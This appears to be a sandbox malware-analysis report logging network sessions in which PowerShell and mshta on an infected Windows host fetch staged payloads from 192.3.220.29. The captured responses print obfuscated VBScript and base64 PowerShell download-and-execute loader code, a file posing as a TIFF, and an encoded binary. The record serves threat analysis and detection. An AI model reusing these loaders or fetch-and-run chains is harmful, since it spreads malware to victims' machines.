                                                                                                            Data Raw: 32 35 25 32 35 33 36 25 32 35 33 31 25 32 35 32 35 25 32 35 33 35 25 32 35 33 33 25 32 35 32 35 25 32 35 33 37 25 32 35 33 35 25 32 35 32 35 25 32 35 33 37 25 32 35 34 31 25 32 35 32 35 25 32 35 33 36 25 32 35 34 34 25 32 35 32 35 25 32 35 33 36 25 32 35 34 34 25 32 35 32 35 25 32 35 33 36 25 32 35 33 34 25 32 35 32 35 25 32 35 33 36 25 32 35 33 32 25 32 35 32 35 25 32 35 33 36 25 32 35 33 32 25 32 35 32 35 25 32 35 33 35 25 32 35 33 30 25 32 35 32 35 25 32 35 33 35 25 32 35 33 38 25 32 35 32 35 25 32 35 33 36 25 32 35 33 35 25 32 35 32 35 25 32 35 33 36 25 32 35 33 39 25 32 35 32 35 25 32 35 33 35 25 32 35 33 37 25 32 35 32 35 25 32 35 33 37 25 32 35 33 30 25 32 35 32 35 25 32 35 33 36 25 32 35 33 35 25 32 35 32 35 25 32 35 33 36 25 32 35 34 34 25 32 35 32 35 25 32 35 33 34 25 32 35 33 35 25 32 35 32 35 25 32 35 33 35 25 32 35 33 33 25 32 35 32 35 25 32 35 33 36 25 32 35 33 39 25 32 35 32 35 25 32 35 33 36 25 32 35 33 34 25 32 35 32 35 25 32 35 33 36 25 32 35 34 33 25 32 35 32 35 25 32 35 33 34 25 [TRUNCATED]
                                                                                                            Data Ascii: 25%2536%2531%2525%2535%2533%2525%2537%2535%2525%2537%2541%2525%2536%2544%2525%2536%2544%2525%2536%2534%2525%2536%2532%2525%2536%2532%2525%2535%2530%2525%2535%2538%2525%2536%2535%2525%2536%2539%2525%2535%2537%2525%2537%2530%2525%2536%2535%2525%2536%2544%2525%2534%2535%2525%2535%2533%2525%2536%2539%2525%2536%2534%2525%2536%2543%2525%2534%2545%2525%2536%2537%2525%2536%2539%2525%2536%2536%2525%2535%2532%2525%2536%2531%2525%2534%2536%2525%2535%2531%2525%2535%2534%2525%2534%2534%2525%2536%2536%2525%2536%2531%2525%2534%2531%2525%2536%2546%2525%2537%2533%2525%2537%2536%2525%2536%2536%2525%2537%2535%2525%2534%2536%2525%2536%2537%2525%2535%2536%2525%2537%2536%2525%2537%2538%2525%2536%2536%2525%2534%2536%2525%2534%2539%2525%2535%2539%2525%2535%2539%2525%2535%2537%2525%2536%2542%2525%2536%2532%2525%2535%2539%2525%2534%2539%2525%2536%2531%2525%2535%2532%2525%2536
                                                                                                            Nov 20, 2024 16:57:26.891010046 CET1236INData Raw: 25 32 35 34 36 25 32 35 32 35 25 32 35 33 35 25 32 35 33 33 25 32 35 32 35 25 32 35 33 36 25 32 35 34 36 25 32 35 32 35 25 32 35 33 34 25 32 35 34 35 25 32 35 32 35 25 32 35 33 34 25 32 35 33 32 25 32 35 32 35 25 32 35 33 36 25 32 35 34 33 25 32
                                                                                                            Data Ascii: %2546%2525%2535%2533%2525%2536%2546%2525%2534%2545%2525%2534%2532%2525%2536%2543%2525%2536%2538%2525%2534%2531%2525%2534%2531%2525%2535%2535%2525%2534%2533%2525%2537%2531%2525%2536%2545%2525%2537%2532%2525%2537%2533%2525%2534%2538%2525%2536%25
                                                                                                            Nov 20, 2024 16:57:26.891022921 CET448INData Raw: 32 35 32 35 25 32 35 33 35 25 32 35 33 32 25 32 35 32 35 25 32 35 33 34 25 32 35 33 36 25 32 35 32 35 25 32 35 33 36 25 32 35 33 35 25 32 35 32 35 25 32 35 33 36 25 32 35 34 35 25 32 35 32 35 25 32 35 33 36 25 32 35 33 36 25 32 35 32 35 25 32 35
                                                                                                            Data Ascii: 2525%2535%2532%2525%2534%2536%2525%2536%2535%2525%2536%2545%2525%2536%2536%2525%2535%2531%2525%2534%2534%2525%2534%2538%2525%2534%2538%2525%2537%2541%2525%2536%2532%2525%2536%2539%2525%2534%2543%2525%2534%2533%2525%2536%2543%2525%2534%2543%252
                                                                                                            Nov 20, 2024 16:57:26.891113043 CET1236INData Raw: 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25
                                                                                                            Data Ascii: 9%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2
                                                                                                            Nov 20, 2024 16:57:26.891140938 CET1236INData Raw: 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32
                                                                                                            Data Ascii: %2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%25
                                                                                                            Nov 20, 2024 16:57:26.891154051 CET1236INData Raw: 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35
                                                                                                            Data Ascii: 2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%253
                                                                                                            Nov 20, 2024 16:57:26.891166925 CET1236INData Raw: 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33
                                                                                                            Data Ascii: 525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525
                                                                                                            Nov 20, 2024 16:57:26.891180038 CET1236INData Raw: 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39
                                                                                                            Data Ascii: 30%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2532%2543%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%
                                                                                                            Nov 20, 2024 16:57:26.891191959 CET1236INData Raw: 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25
                                                                                                            Data Ascii: 9%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2
                                                                                                            Nov 20, 2024 16:57:26.891204119 CET1236INData Raw: 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32
                                                                                                            Data Ascii: %2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%25
                                                                                                            Nov 20, 2024 16:57:27.010790110 CET1236INData Raw: 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35 32 35 25 32 35 33 30 25 32 35 33 39 25 32 35
                                                                                                            Data Ascii: 2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%2539%2525%2530%253


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.2249167192.3.220.29803976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 16:57:35.642501116 CET381OUTGET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: 192.3.220.29
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 16:57:36.883152962 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 15:57:35 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                            Last-Modified: Wed, 20 Nov 2024 06:26:54 GMT
                                                                                                            ETag: "22c82-627523c6ee3e7"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 142466
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: image/tiff
                                                                                                            Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 72 00 65 00 73 00 74 00 69 00 76 00 6f 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 61 00 6d 00 62 00 61 00 72 00 69 00 6e 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 70 00 6e 00 65 00 6f 00 6d 00 65 00 74 00 72 00 69 00 61 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 6e 00 74 00 72 00 61 00 6d 00 61 00 72 00 74 00 65 00 6c 00 6f 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 65 00 73 00 66 00 61 00 6c 00 66 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 73 00 66 00 61 00 6c 00 66 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 61 00 6d 00 62 00 61 00 72 00 69 00 6e 00 6f 00 2c 00 20 00 70 00 6e 00 65 00 6f 00 6d 00 65 00 74 00 72 00 69 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 65 00 [TRUNCATED]
                                                                                                            Data Ascii: Function restivo(ByVal ambarino, ByVal pneometria, ByVal contramartelos) Dim esfalfamento esfalfamento = InStr(ambarino, pneometria) Do While esfalfamento > 0 ambarino = Left(ambarino, esfalfamento - 1) & contramartelos & Mid(ambarino, esfalfamento + Len(pneometria)) esfalfamento = InStr(esfalfamento + Len(contramartelos), ambarino, pneometria) Loop restivo = ambarinoEnd Functionprivate fun
                                                                                                            Nov 20, 2024 16:57:36.883167982 CET224INData Raw: 00 63 00 74 00 69 00 6f 00 6e 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74
                                                                                                            Data Ascii: ction ReadStdIn() while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wende
                                                                                                            Nov 20, 2024 16:57:36.883188963 CET1236INData Raw: 00 6e 00 64 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 49 00 66 00 20 00 4e 00 6f 00 74 00 20 00 74 00 65 00 73 00 6f 00 75 00 72 00 61 00 28 00 29 00 20 00 54 00 68 00 65 00 6e 00 0d 00 0a 00 20
                                                                                                            Data Ascii: nd functionIf Not tesoura() Then On Error Resume Next reiterativo = "JiAoICR2ZXJCb1Nl
                                                                                                            Nov 20, 2024 16:57:36.883199930 CET224INData Raw: 00 31 00 50 00 59 00 6d 00 70 00 6c 00 59 00 33 00 51 00 67 00 55 00 33 00 6c 00 7a 00 64 00 47 00 56 00 74 00 4c 00 6b 00 35 00 6c 00 64 00 43 00 35 00 58 00 5a 00 57 00 4a 00 44 00 62 00 47 00 6c 00 6c 00 62 00 6e 00 51 00 37 00 62 00 33 00 42
                                                                                                            Data Ascii: 1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZBWDCJXRASYMEQGU2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3B
                                                                                                            Nov 20, 2024 16:57:36.883213997 CET1236INData Raw: 00 70 00 61 00 57 00 31 00 68 00 5a 00 32 00 56 00 56 00 63 00 6d 00 77 00 70 00 4f 00 32 00 39 00 77 00 61 00 57 00 6c 00 74 00 59 00 57 00 64 00 6c 00 56 00 47 00 56 00 34 00 64 00 43 00 41 00 39 00 49 00 46 00 74 00 54 00 65 00 58 00 4e 00 30
                                                                                                            Data Ascii: paW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKy" reiterativo = reite
                                                                                                            Nov 20, 2024 16:57:36.883233070 CET1236INData Raw: 00 55 00 55 00 6e 00 4b 00 79 00 64 00 34 00 4f 00 32 00 39 00 77 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 61 00 58 00 4e 00 30 00 59 00 58 00 4a 00 30 00 53 00 57 00 35 00 6b 00 5a 00 58 00 67
                                                                                                            Data Ascii: UUnKyd4O29wBWDCJXRASYMEQGUaXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtBWDCJXRASYMEQGUvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGll
                                                                                                            Nov 20, 2024 16:57:36.883246899 CET1236INData Raw: 00 72 00 65 00 69 00 74 00 65 00 72 00 61 00 74 00 69 00 76 00 6f 00 20 00 3d 00 20 00 72 00 65 00 69 00 74 00 65 00 72 00 61 00 74 00 69 00 76 00 6f 00 20 00 26 00 20 00 22 00 79 00 62 00 32 00 31 00 43 00 59 00 58 00 4e 00 6c 00 4a 00 79 00 73
                                                                                                            Data Ascii: reiterativo = reiterativo & "yb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJBWDCJXRASYMEQGUzZWQpOBWDCJXRASYMEQGU29waWxvYWRlZ
                                                                                                            Nov 20, 2024 16:57:36.883260012 CET672INData Raw: 00 42 00 70 00 5a 00 6d 00 52 00 44 00 59 00 58 00 4e 00 51 00 62 00 32 00 78 00 70 00 5a 00 6d 00 51 00 73 00 49 00 47 00 6c 00 6d 00 5a 00 47 00 52 00 6c 00 63 00 32 00 46 00 30 00 61 00 58 00 59 00 6e 00 4b 00 79 00 64 00 68 00 5a 00 47 00 38
                                                                                                            Data Ascii: BpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZ
                                                                                                            Nov 20, 2024 16:57:36.883275032 CET1236INData Raw: 00 63 00 70 00 4c 00 6e 00 4a 00 6c 00 55 00 45 00 78 00 42 00 51 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 32 00 55 00 6f 00 4a 00 7a 00 42 00 52 00 62 00 43 00 63 00 73 00 57 00 31 00 4e 00 30
                                                                                                            Data Ascii: cpLnJlUExBQBWDCJXRASYMEQGU2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0No
                                                                                                            Nov 20, 2024 16:57:36.884166002 CET1116INData Raw: 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 3d 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74
                                                                                                            Data Ascii: RASYMEQGU" momposteiro = momposteiro & ";BWDCJXRASYMEQGU$OBWDCJXRASYMEQGU" momposteiro = momposteiro &
                                                                                                            Nov 20, 2024 16:57:37.004192114 CET1236INData Raw: 00 45 00 51 00 47 00 55 00 2e 00 65 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 6e 00 63 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 6f 00 22 00 0d
                                                                                                            Data Ascii: EQGU.eBWDCJXRASYMEQGUncBWDCJXRASYMEQGUo" momposteiro = momposteiro & "dBWDCJXRASYMEQGUinBWDCJXRASYMEQGU"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.2249173192.3.220.29803652C:\Windows\System32\mshta.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 16:57:54.702392101 CET485OUTGET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            If-Modified-Since: Wed, 20 Nov 2024 07:47:08 GMT
                                                                                                            Connection: Keep-Alive
                                                                                                            Host: 192.3.220.29
                                                                                                            If-None-Match: "5a0de-627535b5bef4e"
                                                                                                            Nov 20, 2024 16:57:55.899717093 CET275INHTTP/1.1 304 Not Modified
                                                                                                            Date: Wed, 20 Nov 2024 15:57:54 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                            Last-Modified: Wed, 20 Nov 2024 07:47:08 GMT
                                                                                                            ETag: "5a0de-627535b5bef4e"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.2249175192.3.220.29801712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 20, 2024 16:58:10.746967077 CET75OUTGET /45/HDRDDG.txt HTTP/1.1
                                                                                                            Host: 192.3.220.29
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 20, 2024 16:58:11.865583897 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 20 Nov 2024 15:58:10 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                            Last-Modified: Wed, 20 Nov 2024 06:25:06 GMT
                                                                                                            ETag: "a0800-6275235f113e8"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 657408
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: text/plain
                                                                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                            Nov 20, 2024 16:58:11.865606070 CET1236INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                            Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
                                                                                                            Nov 20, 2024 16:58:11.865621090 CET448INData Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
                                                                                                            Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
                                                                                                            Nov 20, 2024 16:58:11.865690947 CET1236INData Raw: 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44
                                                                                                            Data Ascii: rDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD9
                                                                                                            Nov 20, 2024 16:58:11.865704060 CET1236INData Raw: 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 38 35 67 52 4f 55 6b 44 45 34 77 50
                                                                                                            Data Ascii: glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85gROUkDE4wPO4jD94APAAAA5AUAoAYDS2AkN4YDM2giNgYDG2AhNIYDA1gfNwXD61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKN
                                                                                                            Nov 20, 2024 16:58:11.865719080 CET1236INData Raw: 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44
